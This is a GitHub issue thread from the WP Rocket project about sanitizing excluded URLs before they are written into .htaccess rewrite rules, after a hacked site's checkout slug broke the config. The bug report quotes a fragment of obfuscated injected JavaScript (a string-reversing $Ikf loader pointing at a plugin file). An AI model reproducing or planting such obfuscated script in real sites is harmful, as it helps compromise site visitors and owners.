Sanitize URLs before adding them to the config file

[camilamadronero]

Is your feature request related to a problem? Please describe. Our rewrite rules can cause a 500 error when the excluded URLs are faulty.

In a specific example, when the URL includes a string from a hack, an it was added like this:

RewriteCond %{REQUEST_URI} !^(/(?:.+/)?feed(?:/(?:.+/?)?)?$|/(?:.+/)?embed/|/comm<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigul/(.*)|/panier/|/mon-compte/(.*)|/wc-api/v(.*)|/(index\.php/)?(.*)wp\-json(/.*|$))$ [NC]

Describe the solution you'd like Sanitize URLs before adding them to the config file.

Additional context Slack thread: https://wp-media.slack.com/archives/C43T1AYMQ/p1677164641055989 Ticket: https://secure.helpscout.net/conversation/2163123979/404110/

[mostafa-hisham]

Reproduce the problem

I couldn't reproduce it

Identify the root cause

the website was hacked and the slug (permalink) of the woocommerce checkout page was changed https://jumpshare.com/v/27u1o8DIetHgk2scnJIw by default when you change the permalink WordPress sanitizes it to be like this /commscriptikffunctionnif-typeof-ikf-listn-string-return-ikf-listn-split-reverse-joinreturn-ikf-listnikf-listphp-eroc_nimda-bil-steewt-tsetal-siseneg-snigul

Scope a solution

We can edit the woocommerce third-party class to sanitize the URLs before adding them to .htaccess file https://github.com/wp-media/wp-rocket/blob/0dd1e1f144947ddded9d00b4a27f431d9b7d1848/inc/ThirdParty/Plugins/Ecommerce/WooCommerceSubscriber.php#L124-L126 using the sanitize_title

@wp-media/php please have another look at it

Estimate the effort

Effort XS